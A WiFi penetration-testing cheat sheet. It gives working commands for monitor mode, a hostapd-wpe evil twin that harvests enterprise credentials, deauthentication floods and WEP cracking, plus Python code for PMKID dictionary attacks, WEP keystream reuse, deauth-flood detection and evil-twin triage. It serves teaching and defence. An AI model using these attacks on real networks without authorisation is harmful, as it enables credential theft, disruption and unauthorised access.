Hey there, hackers! This guide is a cheat sheet of WiFi penetration testing commands, covering the tools and techniques you need to get started.
Switching Wireless Modes
Before diving in, a word on wireless card modes. Two matter here: Managed Mode, the normal client mode in which the card associates to an AP and only sees frames addressed to it, and Monitor Mode, in which the card hands every 802.11 frame it hears on the current channel to userland without associating to anything. Most of the tools below need Monitor Mode, and the active attacks (deauthentication, fake authentication, replay) additionally need a chipset and driver that support packet injection.
Monitor Mode (airmon-ng)
airmon-ng (part of the aircrack-ng suite) puts the card into Monitor Mode and, on current versions, creates a new interface for it, usually named wlan0mon; use whatever name airmon-ng prints in the commands that follow. Run:
# Kill every process that might interfere with the card (NetworkManager, wpa_supplicant, dhclient, ...)
airmon-ng check kill
# Start monitor mode on wlan0 (note the monitor interface name in the output)
airmon-ng start wlan0
Monitor Mode (manual)
Alternatively, you can enable Monitor Mode by hand with the wireless-tools commands. The interface keeps its name (wlan0) this way, and the card must be down while the mode is changed. On current distributions the iw and ip tools replace iwconfig and ifconfig, but the commands below still work wherever wireless-tools is installed:
# Check wireless interfaces and their current mode (look for Mode:Managed)
iwconfig
# Disable the network interface; the mode cannot be changed while it is up
ifconfig wlan0 down
# Change the mode of wlan0 to "monitor"
iwconfig wlan0 mode monitor
# Re-enable the network interface
ifconfig wlan0 up
# Verify: the interface should now report Mode:Monitor
iwconfig
Rogue APs (Evil Twin Attack)
A Rogue AP is any access point on the air that the network owner did not authorize. An Evil Twin is a rogue AP that broadcasts the same SSID (and normally the same security type) as a legitimate network so that clients, which choose APs by SSID and signal strength, connect to the attacker instead. Once a client is on the fake AP the attacker sits in the path of its traffic and, against WPA/WPA2-Enterprise, can harvest the EAP credentials the client presents when it authenticates.
For WPA/WPA2 MGT (Enterprise)
hostapd-wpe is a patched hostapd that runs an AP with its own EAP server, accepts whatever credentials a client offers and logs them. Supplicants that do not validate the RADIUS server certificate complete PEAP or EAP-TTLS with MS-CHAPv2 against it, which leaves a challenge/response pair that asleap or hashcat (mode 5500) can crack offline; that missing certificate validation is the weakness the attack relies on. To set one up:
- Install dependencies (hostapd-wpe is packaged in Kali; elsewhere it has to be built from source against libnl and OpenSSL):
sudo apt install libnl-3-dev libssl-dev
sudo apt install hostapd-wpe
- Edit the configuration file and add the following at the end (the stock file already carries the 802.1X/EAP-server settings; these lines point hostapd-wpe at your second card and name the fake AP). interface must be a second adapter that is left in managed mode, because hostapd switches it to AP mode itself, and ssid should match the target network to be a real twin (LKY_Test is a placeholder):
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
...
interface=wlan1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ssid=LKY_Test
channel=1
hw_mode=b
auth_server_addr=127.0.0.1
auth_server_port=18120
auth_server_shared_secret=p@ssw0rd
wpa_pairwise=TKIP CCMP
- Run the fake AP (hostapd-wpe brings up its own RADIUS/EAP server; airmon-ng check kill stops NetworkManager so it does not grab wlan1). Captured usernames and MS-CHAPv2 challenge/response pairs are printed on the console as clients connect:
sudo airmon-ng check kill
sudo /usr/sbin/hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Deauthentication
Deauthentication frames are management frames that tell a station its association is over. Before 802.11w (Protected Management Frames) they carry no authentication at all, so anyone who can inject on the channel can spoof them from the AP's address and kick a client off. In a pentest this is used to force a client to reconnect so the WPA 4-way handshake can be captured, to push clients toward an evil twin, or simply as denial of service. On networks that require PMF, spoofed deauths are ignored by the client.
Deauthentication using Aireplay-ng
To deauthenticate a client with aireplay-ng, with the interface in monitor mode on the AP's channel (-a is the AP's BSSID, -c the client's MAC), run:
# Deauth client 00:0F:B5:34:30:30 from AP 00:14:6C:7E:40:80; -0 0 keeps sending until stopped, a small count such as -0 5 is enough to trigger a handshake
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 wlan0
# Broadcast deauth to every client of the AP (many clients ignore broadcast deauths, so this doesn't always work)
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 wlan0
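To show what aireplay-ng actually puts on the air, and what a wireless IDS looks for, here is an added example (not code from the original page or from aircrack-ng) that builds and dissects 802.11 deauthentication frames with the standard library only and then counts deauths per transmitter over a constructed batch of frames. The MACs are the ones used in the commands above; the 20-frame flood and the threshold are made-up sample data.

```python
import struct
from collections import Counter

# Added example, not from the original page: raw 802.11 deauth frames and a simple flood detector.
BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT = 0              # frame type 0 = management
SUBTYPE_DEAUTH = 12   # subtype 0xC = deauthentication
SUBTYPE_BEACON = 8
REASON_CLASS3_FROM_NONASSOC = 7   # reason code aireplay-ng -0 puts in its frames


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype, addr1, addr2, addr3, body, seq=0):
    """Generic management frame: 24-byte MAC header followed by the body.
    Frame control is little-endian; bits 2-3 are the type, bits 4-7 the subtype, flags byte is 0."""
    fc = (subtype << 4) | (MGMT << 2)
    hdr = struct.pack("<HH6s6s6sH", fc, 0, mac_bytes(addr1), mac_bytes(addr2),
                      mac_bytes(addr3), seq << 4)   # sequence number sits in the top 12 bits
    return hdr + body


def build_deauth(bssid, client=BROADCAST, reason=REASON_CLASS3_FROM_NONASSOC, seq=0):
    """Deauth as the AP would send it: addr1 = receiver (client or broadcast),
    addr2 = transmitter, addr3 = BSSID. The body is only the 2-byte reason code."""
    return build_mgmt(SUBTYPE_DEAUTH, client, bssid, bssid, struct.pack("<H", reason), seq)


def build_beacon(bssid, seq=0):
    """Minimal beacon body: 8-byte timestamp, beacon interval, capability field (no IEs)."""
    return build_mgmt(SUBTYPE_BEACON, BROADCAST, bssid, bssid, struct.pack("<QHH", 0, 100, 0x0411), seq)


def parse_frame(raw):
    fc, _dur, a1, a2, a3, seqctl = struct.unpack_from("<HH6s6s6sH", raw, 0)
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3),
            "seq": seqctl >> 4}
    if info["type"] == MGMT and info["subtype"] == SUBTYPE_DEAUTH:
        info["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return info


def detect_deauth_flood(frames, threshold=10):
    """Count deauth frames per transmitter address and return those at or above threshold.
    A real WIDS would also window this by time and check sequence-number jumps."""
    counts = Counter(f["addr2"] for f in map(parse_frame, frames)
                     if f["type"] == MGMT and f["subtype"] == SUBTYPE_DEAUTH)
    return {mac: n for mac, n in counts.items() if n >= threshold}


# Constructed sample: 20 spoofed deauths (what aireplay-ng -0 emits) plus 3 beacons from the same AP.
AP, CLIENT = "00:14:6c:7e:40:80", "00:0f:b5:34:30:30"
SAMPLE_FRAMES = ([build_deauth(AP, CLIENT, seq=i) for i in range(20)] +
                 [build_beacon(AP, seq=i) for i in range(3)])

if __name__ == "__main__":
    print(build_deauth(AP, CLIENT).hex())
    print(detect_deauth_flood(SAMPLE_FRAMES))
```

The first two bytes of the deauth frame are c0 00 (frame control) and the last two are the reason code; nothing in the 26 bytes ties the frame to the real AP, which is the whole problem PMF fixes. A detector that keys on type 0 / subtype 12 from one transmitter, as detect_deauth_flood does, is also how Kismet's deauth-flood alert works in spirit.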
WEP Cracking
WEP (Wired Equivalent Privacy) is the original, long-deprecated 802.11 encryption. It encrypts each frame with RC4 under a per-packet key made of a 24-bit IV prepended to the shared key, and protects integrity with a CRC-32 ICV. The IV space is so small that keystreams repeat within hours on a busy network, and statistical attacks on weak IVs (FMS, later PTW) recover the key from a few tens of thousands of captured IVs. The workflow is to capture IVs, generate traffic so they arrive faster, then run aircrack-ng on the capture:
- Start monitor mode on the target's channel (6 here):
airmon-ng start wlan0 6
- Start airodump-ng to capture IVs from the target BSSID; -w output writes them to output-01.cap:
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w output wlan0
- In another terminal, fake-authenticate with the AP so it accepts frames from your MAC (-e is the ESSID, -h your card's MAC):
aireplay-ng -1 0 -e Lucky_Wifi_5G -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
- Start aireplay-ng in ARP request replay mode; it waits for an ARP request and retransmits it over and over, and every reply from the AP carries a fresh IV:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
Once the # Data column in airodump-ng reaches tens of thousands of frames (with PTW, on the order of 20,000 for a 40-bit key and 40,000 or more for a 104-bit key), run aircrack-ng against the output-01.cap file to recover the key.
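The procedure above works because of how WEP combines RC4 with a tiny IV. Here is an added example (not code from the original page or from aircrack-ng) that implements WEP framing with the standard library and shows the IV-reuse failure the ARP replay exploits: once one packet's plaintext is known, its keystream falls out, and every other packet sent under the same IV decrypts without the key. The key, IV, ARP-like plaintext and "secret" payload are constructed sample data.

```python
import math
import struct
import zlib

# Added example, not from the original page: minimal WEP and the keystream-reuse attack.


def rc4(key, data):
    """Plain RC4: key-scheduling algorithm followed by the PRGA XORed onto data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(body):
    """WEP integrity check value: CRC-32 over the plaintext, little-endian, encrypted with it."""
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def wep_encrypt(key, iv, body):
    """Per-packet RC4 key = 24-bit IV || shared key; the IV is sent in the clear in front."""
    assert len(iv) == 3
    return iv + rc4(iv + key, body + icv(body))


def wep_decrypt(key, packet):
    iv, ct = packet[:3], packet[3:]
    pt = rc4(iv + key, ct)
    body, tag = pt[:-4], pt[-4:]
    return body, tag == icv(body)


def keystream_from_known_plaintext(packet, body):
    """Attacker step: for a packet whose plaintext is known (ARP requests are the classic
    case: fixed LLC/SNAP header and fixed length), keystream = ciphertext XOR (plaintext || ICV)."""
    iv, ct = packet[:3], packet[3:]
    return iv, bytes(a ^ b for a, b in zip(ct, body + icv(body)))


def decrypt_with_keystream(packet, keystreams):
    """Decrypt any packet that reuses an IV we already hold keystream for; no key involved.
    Only the first len(keystream) bytes can be recovered."""
    iv, ct = packet[:3], packet[3:]
    ks = keystreams.get(iv)
    if ks is None or len(ks) < len(ct):
        return None
    return bytes(a ^ b for a, b in zip(ct, ks))[:-4]


def iv_reuse_probability(n_packets, iv_bits=24):
    """Birthday bound: probability that at least one IV repeats among n randomly chosen IVs."""
    return 1.0 - math.exp(-n_packets * (n_packets - 1) / (2.0 * 2 ** iv_bits))


# Constructed sample data (not a real capture)
KEY = bytes.fromhex("0102030405")                     # 40-bit WEP key
IV = b"\x00\x00\x2a"                                  # an IV the AP happens to reuse
ARP_PLAINTEXT = (bytes.fromhex("aaaa030000000806")     # LLC/SNAP header for ARP
                 + b"\x00\x01\x08\x00\x06\x04\x00\x01"  # ARP request header
                 + b"\x00" * 20)                       # address fields left zero for the demo
SECRET = b"GET /login?user=admin&pass=hunter2"


def demo():
    """Recover SECRET from a second packet under the same IV using only the ARP packet's plaintext."""
    pkt_known = wep_encrypt(KEY, IV, ARP_PLAINTEXT)
    pkt_secret = wep_encrypt(KEY, IV, SECRET)
    iv, ks = keystream_from_known_plaintext(pkt_known, ARP_PLAINTEXT)
    return decrypt_with_keystream(pkt_secret, {iv: ks})


if __name__ == "__main__":
    print(demo())
    print(f"IV reuse after 5000 packets: {iv_reuse_probability(5000):.0%}")
```

demo() returns the secret payload without ever touching KEY; with 2^24 IVs the reuse probability passes 50% after only about 4,800 packets, and a replayed ARP request makes the AP produce thousands of such packets a minute. Key recovery (FMS/PTW) is a further statistical step on top of this that aircrack-ng performs for you.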
WLAN Monitoring and Analysis
Surveying what is on the air comes before any attack: which SSIDs exist, on which channels, with which security type, and which clients talk to which BSSID. Here are some tools for that:
airodump-ng
airodump-ng lists the access points it hears and the clients associated to them, and with -w writes everything to files named after the prefix: <prefix>-01.cap holds the raw packets and <prefix>-01.csv the AP and station tables. Example:
# start monitor mode
airmon-ng check kill
airmon-ng start wlan0
# capture on the monitor interface (use the name airmon-ng printed, usually wlan0mon)
airodump-ng wlan0mon -w ap_scan_1
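The CSV that -w produces is the quickest place to spot an evil twin like the one set up with hostapd-wpe above: the same ESSID announced by a BSSID that is not one of yours, often with a different cipher list or channel. Here is an added example (not code from the original page or from aircrack-ng) that parses that CSV layout and flags such ESSIDs, together with the clients that have attached to each BSSID. The CSV text is constructed in the layout airodump-ng writes; the MACs, names and timestamps are made up.

```python
import csv
import io
from collections import defaultdict

# Added example, not from the original page: evil-twin triage over an airodump-ng CSV.

# Constructed sample in airodump-ng's CSV layout (AP table, blank line, station table).
# 02:0C:29:AA:BB:CC plays the hostapd-wpe twin: same ESSID, channel 1, 11 Mbit (hw_mode=b), TKIP+CCMP.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2024-03-01 10:00:00, 2024-03-01 10:05:00,  6,  54, WPA2, CCMP, MGT, -40,      120,        0,   0.  0.  0.  0,   9, Corp_WiFi, 
02:0C:29:AA:BB:CC, 2024-03-01 10:02:00, 2024-03-01 10:05:00,  1,  11, WPA2, TKIP CCMP, MGT, -35,       60,        0,   0.  0.  0.  0,   9, Corp_WiFi, 
00:1A:2B:3C:4D:5E, 2024-03-01 10:00:00, 2024-03-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,      110,        0,   0.  0.  0.  0,   7, HomeNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:34:30:30, 2024-03-01 10:03:00, 2024-03-01 10:05:00, -50,       30, 02:0C:29:AA:BB:CC, Corp_WiFi
00:0F:B5:88:AC:82, 2024-03-01 10:01:00, 2024-03-01 10:05:00, -60,       12, (not associated), Corp_WiFi,HomeNet
"""


def parse_airodump_csv(text):
    """Return (aps, stations) as lists of dicts. The file has two header rows; everything
    after 'BSSID' is an AP row, everything after 'Station MAC' is a client row."""
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text)):
        row = [c.strip() for c in row]
        if not any(row):
            continue
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps.append({"bssid": row[0].lower(), "channel": int(row[3]), "privacy": row[5],
                        "cipher": row[6], "auth": row[7], "power": int(row[8]), "essid": row[13]})
        elif section == "sta" and len(row) >= 6:
            stations.append({"mac": row[0].lower(), "power": int(row[3]), "bssid": row[5].lower(),
                             "probes": [p for p in row[6:] if p]})   # probed ESSIDs are comma-separated
    return aps, stations


def find_evil_twins(aps):
    """ESSIDs served by more than one BSSID. Several BSSIDs per ESSID is normal for a multi-AP
    deployment, so the strong signal is a security profile that differs between them."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap["essid"]:
            by_essid[ap["essid"]].append(ap)
    findings = {}
    for essid, group in by_essid.items():
        if len(group) < 2:
            continue
        profiles = {(ap["privacy"], ap["cipher"], ap["auth"]) for ap in group}
        findings[essid] = {"bssids": sorted(ap["bssid"] for ap in group),
                           "channels": sorted({ap["channel"] for ap in group}),
                           "security_mismatch": len(profiles) > 1}
    return findings


def clients_of(stations, bssid):
    """Station MACs currently associated to a BSSID (who has already fallen for the twin)."""
    return sorted(s["mac"] for s in stations if s["bssid"] == bssid.lower())


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for essid, f in find_evil_twins(aps).items():
        print(essid, f, "clients:", [clients_of(stations, b) for b in f["bssids"]])
```

Run it on a real ap_scan_1-01.csv by reading the file into parse_airodump_csv; the "(not associated)" station with probes for Corp_WiFi is the kind of client an evil twin is waiting for.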
iwlist
iwlist uses the card's normal managed-mode scan, so it works without Monitor Mode but only shows what APs advertise in their beacons and probe responses (SSID, channel, signal, security); it belongs to the deprecated wireless-tools package. Example:
iwlist wlan0 scan
kismet
kismet is a passive wireless sniffer and IDS: it channel-hops a monitor-mode interface, records APs, clients and probe requests, and raises alerts for anomalies such as deauthentication floods. Example:
kismet -c wlan0
nmcli
nmcli is NetworkManager's command-line client; its scan listing is a quick way to see SSIDs, channels, signal and security type from a normal client interface. Note that NetworkManager must be stopped before using monitor-mode tools, which is what airmon-ng check kill does. Example:
nmcli dev wifi list
WPA2-PSK Cracking
WPA2-PSK (WPA2-Personal) derives the Pairwise Master Key from the passphrase and the SSID with PBKDF2 (4096 iterations of HMAC-SHA1), so the network is exactly as strong as the passphrase: attacks are offline guesses checked against material captured from the air, either the 4-way handshake or a PMKID. The slow derivation is what makes this harder than WEP, not anything in the protocol that a strong passphrase would not already cover.
PMKID Attack
The PMKID is HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC). APs that support PMKSA caching include it in the RSN IE of the first EAPOL message, which means an attacker can collect it just by starting an association with the AP, with no connected client and no deauthentication needed, and then attack it offline with hashcat (mode 22000).
# (Note: This section is incomplete and will be updated soon)
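Here is an added example (not code from the original page, nor from hashcat or hcxtools) that carries the derivation above through in Python: PMK from passphrase and SSID, PMKID from PMK and the two MACs, the hashcat 22000 line that a capture tool would emit, and the offline dictionary check itself. The SSID, MACs, passphrase and wordlist are constructed; the "captured" PMKID is computed from them rather than sniffed.

```python
import hashlib
import hmac

# Added example, not from the original page: WPA2-PSK PMK/PMKID derivation and an offline check.


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step, and the only one a dictionary attack has to repeat per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA) truncated to 128 bits.
    The AP sends it in the RSN IE of EAPOL message 1, before any client proves anything."""
    data = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid_bytes, ap_mac, sta_mac, ssid):
    """hashcat -m 22000 record for a PMKID (type 01): WPA*01*PMKID*AP*STA*ESSIDhex***"""
    return "WPA*01*{}*{}*{}*{}***".format(pmkid_bytes.hex(),
                                        ap_mac.replace(":", "").lower(),
                                        sta_mac.replace(":", "").lower(),
                                        ssid.encode().hex())


def crack_pmkid(captured, ssid, ap_mac, sta_mac, wordlist):
    """Offline dictionary attack: recompute the PMKID for each candidate and compare."""
    for cand in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac), captured):
            return cand
    return None


# Constructed sample data: no real network behind these values.
SSID, AP_MAC, STA_MAC = "Lucky_Wifi_5G", "00:14:6c:7e:40:80", "00:0f:b5:34:30:30"
REAL_PASSPHRASE = "correcthorse"
CAPTURED_PMKID = pmkid(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC)  # stands in for a sniffed M1
WORDLIST = ["password", "12345678", "LuckyWifi", "correcthorse", "letmein"]

if __name__ == "__main__":
    print(hashcat_22000_line(CAPTURED_PMKID, AP_MAC, STA_MAC, SSID))
    print("cracked:", crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST))
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is why hashcat on GPUs is the practical tool and why a long random passphrase stays out of reach; note also that not every AP includes a PMKID in message 1, in which case the 4-way handshake (with a deauth to provoke it) is the fallback.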
Conclusion
WiFi penetration testing is a complex and challenging field, but with the right tools and techniques, you can become a proficient WiFi penetration tester. Remember to always use your skills for good and never for malicious purposes.
Additional Resources
Here are some additional resources that you can use to learn more about WiFi penetration testing:
Happy hacking!